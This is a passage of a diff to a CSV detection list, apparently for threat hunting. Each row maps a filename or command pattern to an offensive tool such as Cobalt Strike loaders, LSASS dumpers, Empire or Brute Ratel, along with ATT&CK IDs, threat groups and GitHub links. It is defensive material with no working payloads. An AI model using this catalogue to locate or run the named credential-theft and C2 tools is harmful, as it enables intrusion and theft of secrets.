TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*Setting up GFlags & SilentProcessExit settings in 
registry?*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*setuid_setgid.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*setup_apfell.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*setup_obfuscate_xor_key*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "*setup_reflective_loader*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Set-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Set-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*seventeenman/CallBackDump*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*sfp_portscan_tcp.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*sfp_torexits.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" 
-"*Sha-2-*512.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Sha-2-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Sha-2-384.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-*512.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Sha-2-384.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*shadawck/glit*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git 
repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" -"*shadawck/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*shadow_copy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*shadawck/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*shadow_copy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*shadowclock*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shadowclone *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shadowcoerce.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*shadowcoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script 
that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*shadowcopy enum*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*shadowcoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*shadowcopy enum*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*shadowdump.*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*ShadowForge.py*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*ShadowForgeC2-main*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" 
@@ -16478,22 +16661,22 @@ "*ShadowSpray.Kerb*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.sln*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray-master*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" -"*ShadowUser/scvhost.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*ShadowUser/scvhost.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*shareenum.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*shareenumeration*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*shareenumeration*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - 
TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*SharepointExploiter.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*SharepointSiteExploiter.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*Shares/cme_spider_plus*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*Shares/finduncshar_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - 
TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Shares/cme_spider_plus*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Shares/finduncshar_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*Sharp Compile*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" -"*Sharp_v4_x64*.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral 